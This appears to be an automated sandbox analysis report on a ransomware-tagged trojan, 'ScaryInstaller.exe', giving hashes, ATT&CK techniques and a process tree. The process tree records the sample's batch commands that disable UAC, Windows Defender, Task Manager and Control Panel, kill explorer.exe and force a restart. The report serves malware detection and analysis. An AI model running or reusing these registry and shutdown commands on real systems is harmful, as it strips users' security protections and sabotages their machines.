5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164

Reason

Machine shutdown

General

Target

ScaryInstaller.exe
Size

21.5MB
MD5

ac9526ec75362b14410cf9a29806eff4
SHA1

ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256

5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512

29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621
SSDEEP

393216:8c68zOv/h4ZPW+Fsx5QiaamSf8iqTCqcvgQYp6veX0N/9FRI9qo6xE:8j1hY++ViaamEhF5vvY2/VI9qK

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion
Executes dropped EXE 2 IoCs

Processes:

CreepScreen.exemelter.exe

pid process

4416 CreepScreen.exe
2460 melter.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
4416	CreepScreen.exe
2460	melter.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3456-0-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/3456-23-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/3456-40-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1180 timeout.exe
5060 timeout.exe
1204 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1952 taskkill.exe
1276 taskkill.exe
1652 taskkill.exe

pid	process
1180	timeout.exe
5060	timeout.exe
1204	timeout.exe

pid	process
1952	taskkill.exe
1276	taskkill.exe
1652	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "78"	LogonUI.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

224 reg.exe
1792 reg.exe
5000 reg.exe
Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

vlc.exe

pid process

1880 vlc.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid process

1880 vlc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings	cmd.exe

pid	process
224	reg.exe
1792	reg.exe
5000	reg.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exeAUDIODG.EXEvlc.exeshutdown.exe

description	pid	process
Token: SeDebugPrivilege	1652	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: 33	1052	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1052	AUDIODG.EXE
Token: 33	1880	vlc.exe
Token: SeIncBasePriorityPrivilege	1880	vlc.exe
Token: SeShutdownPrivilege	252	shutdown.exe
Token: SeRemoteShutdownPrivilege	252	shutdown.exe

Suspicious use of FindShellTrayWindow 37 IoCs

Processes:

vlc.exe

pid	process
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

CreepScreen.exevlc.exePickerHost.exeLogonUI.exe

pid process

4416 CreepScreen.exe
1880 vlc.exe
1880 vlc.exe
1880 vlc.exe
1880 vlc.exe
3164 PickerHost.exe
4664 LogonUI.exe

pid	process
4416	CreepScreen.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
1880	vlc.exe
3164	PickerHost.exe
4664	LogonUI.exe

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

ScaryInstaller.execmd.exenet.exe

description	pid	process	target process
PID 3456 wrote to memory of 3560	3456	ScaryInstaller.exe	cmd.exe
PID 3456 wrote to memory of 3560	3456	ScaryInstaller.exe	cmd.exe
PID 3456 wrote to memory of 3560	3456	ScaryInstaller.exe	cmd.exe
PID 3560 wrote to memory of 1652	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1652	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1652	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 4416	3560	cmd.exe	CreepScreen.exe
PID 3560 wrote to memory of 4416	3560	cmd.exe	CreepScreen.exe
PID 3560 wrote to memory of 4416	3560	cmd.exe	CreepScreen.exe
PID 3560 wrote to memory of 1180	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 1180	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 1180	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 2460	3560	cmd.exe	melter.exe
PID 3560 wrote to memory of 2460	3560	cmd.exe	melter.exe
PID 3560 wrote to memory of 2460	3560	cmd.exe	melter.exe
PID 3560 wrote to memory of 5060	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 5060	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 5060	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 1952	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1952	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1952	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1276	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1276	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1276	3560	cmd.exe	taskkill.exe
PID 3560 wrote to memory of 1880	3560	cmd.exe	vlc.exe
PID 3560 wrote to memory of 1880	3560	cmd.exe	vlc.exe
PID 3560 wrote to memory of 3792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 3792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 3792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4624	3560	cmd.exe	rundll32.exe
PID 3560 wrote to memory of 4624	3560	cmd.exe	rundll32.exe
PID 3560 wrote to memory of 4624	3560	cmd.exe	rundll32.exe
PID 3560 wrote to memory of 1792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1792	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 224	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 224	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 224	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1136	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1136	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1136	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5000	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5000	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5000	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4900	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4900	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4900	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4812	3560	cmd.exe	net.exe
PID 3560 wrote to memory of 4812	3560	cmd.exe	net.exe
PID 3560 wrote to memory of 4812	3560	cmd.exe	net.exe
PID 4812 wrote to memory of 4084	4812	net.exe	net1.exe
PID 4812 wrote to memory of 4084	4812	net.exe	net1.exe
PID 4812 wrote to memory of 4084	4812	net.exe	net1.exe
PID 3560 wrote to memory of 1204	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 1204	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 1204	3560	cmd.exe	timeout.exe
PID 3560 wrote to memory of 252	3560	cmd.exe	shutdown.exe
PID 3560 wrote to memory of 252	3560	cmd.exe	shutdown.exe
PID 3560 wrote to memory of 252	3560	cmd.exe	shutdown.exe

C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68EB.tmp\creep.cmd" "
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Users\Admin\AppData\Local\Temp\68EB.tmp\CreepScreen.exe
CreepScreen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4416

C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1180

C:\Users\Admin\AppData\Local\Temp\68EB.tmp\melter.exe
melter.exe
3⤵
- Executes dropped EXE
PID:2460

C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
3⤵
- Delays execution with timeout.exe
PID:5060

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\68EB.tmp\scarr.mp4"
3⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1880

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
3⤵
- Sets desktop wallpaper using registry
PID:3792

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
3⤵
PID:4624

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:1792

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:224

C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:5000

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
3⤵
PID:4900

C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
3⤵
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
4⤵
PID:4084

C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1204

C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:252

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3164

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a29055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4664

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\68EB.tmp\CreepScreen.exe
Filesize
128KB

MD5
4ab112b494b6c6762afb1be97cdc19f5

SHA1
eed9d960f86fb10da90d0bbca801aea021658f02

SHA256
ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e

SHA512
4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

Download Submit
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\bg.bmp
Filesize
5.9MB

MD5
463e7914d89b7dd1bfbba5b89c57eace

SHA1
7f697f8880bcf0beed430d80487dd58b975073fa

SHA256
fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d

SHA512
a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

Download Submit
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\creep.cmd
Filesize
1KB

MD5
e77d2ff29ca99c3902d43b447c4039e2

SHA1
2805268a8db128a7278239d82402c9db0a06e481

SHA256
1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c

SHA512
580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\melter.exe
Filesize
2KB

MD5
33b75bd8dbb430e95c70d0265eeb911f

SHA1
5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83

SHA256
2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12

SHA512
943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

Download Submit
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\mover.exe
Filesize
548KB

MD5
c1978e4080d1ec7e2edf49d6c9710045

SHA1
b6a87a32d80f6edf889e99fb47518e69435321ed

SHA256
c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

SHA512
2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

Download Submit
C:\Users\Admin\AppData\Local\Temp\68EB.tmp\scarr.mp4
Filesize
19.0MB

MD5
a504846de42aa7e7b75541fa38987229

SHA1
4c8ba5768db2412d57071071f8573b83ecab0e2d

SHA256
a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89

SHA512
28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

Download Submit
memory/1880-43-0x00007FFC3C820000-0x00007FFC3CAD6000-memory.dmp

Filesize
2.7MB

Download
memory/1880-65-0x00007FFC3CFD0000-0x00007FFC3CFE1000-memory.dmp

Filesize
68KB

Download
memory/1880-78-0x00007FFC2A630000-0x00007FFC2B6E0000-memory.dmp

Filesize
16.7MB

Download
memory/1880-41-0x00007FF7A5C30000-0x00007FF7A5D28000-memory.dmp

Filesize
992KB

Download
memory/1880-42-0x00007FFC42870000-0x00007FFC428A4000-memory.dmp

Filesize
208KB

Download
memory/1880-44-0x00007FFC469B0000-0x00007FFC469C8000-memory.dmp

Filesize
96KB

Download
memory/1880-50-0x00007FFC3D5E0000-0x00007FFC3D5F1000-memory.dmp

Filesize
68KB

Download
memory/1880-49-0x00007FFC3D600000-0x00007FFC3D61D000-memory.dmp

Filesize
116KB

Download
memory/1880-48-0x00007FFC3D620000-0x00007FFC3D631000-memory.dmp

Filesize
68KB

Download
memory/1880-47-0x00007FFC3D640000-0x00007FFC3D657000-memory.dmp

Filesize
92KB

Download
memory/1880-46-0x00007FFC401D0000-0x00007FFC401E1000-memory.dmp

Filesize
68KB

Download
memory/1880-45-0x00007FFC427A0000-0x00007FFC427B7000-memory.dmp

Filesize
92KB

Download
memory/1880-52-0x00007FFC2A630000-0x00007FFC2B6E0000-memory.dmp

Filesize
16.7MB

Download
memory/1880-51-0x00007FFC345D0000-0x00007FFC347DB000-memory.dmp

Filesize
2.0MB

Download
memory/1880-61-0x00007FFC3D020000-0x00007FFC3D038000-memory.dmp

Filesize
96KB

Download
memory/1880-53-0x00007FFC3D0A0000-0x00007FFC3D0E1000-memory.dmp

Filesize
260KB

Download
memory/1880-66-0x00007FFC3C4E0000-0x00007FFC3C537000-memory.dmp

Filesize
348KB

Download
memory/1880-64-0x00007FFC3C650000-0x00007FFC3C6CC000-memory.dmp

Filesize
496KB

Download
memory/1880-63-0x00007FFC3C7B0000-0x00007FFC3C817000-memory.dmp

Filesize
412KB

Download
memory/1880-62-0x00007FFC3CFF0000-0x00007FFC3D020000-memory.dmp

Filesize
192KB

Download
memory/1880-60-0x00007FFC3D040000-0x00007FFC3D051000-memory.dmp

Filesize
68KB

Download
memory/1880-59-0x00007FFC3D060000-0x00007FFC3D07B000-memory.dmp

Filesize
108KB

Download
memory/1880-58-0x00007FFC3D080000-0x00007FFC3D091000-memory.dmp

Filesize
68KB

Download
memory/1880-57-0x00007FFC3D140000-0x00007FFC3D151000-memory.dmp

Filesize
68KB

Download
memory/1880-56-0x00007FFC3D3B0000-0x00007FFC3D3C1000-memory.dmp

Filesize
68KB

Download
memory/1880-55-0x00007FFC3D5C0000-0x00007FFC3D5D8000-memory.dmp

Filesize
96KB

Download
memory/1880-54-0x00007FFC3D4F0000-0x00007FFC3D511000-memory.dmp

Filesize
132KB

Download
memory/3456-23-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download
memory/3456-0-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download
memory/3456-40-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads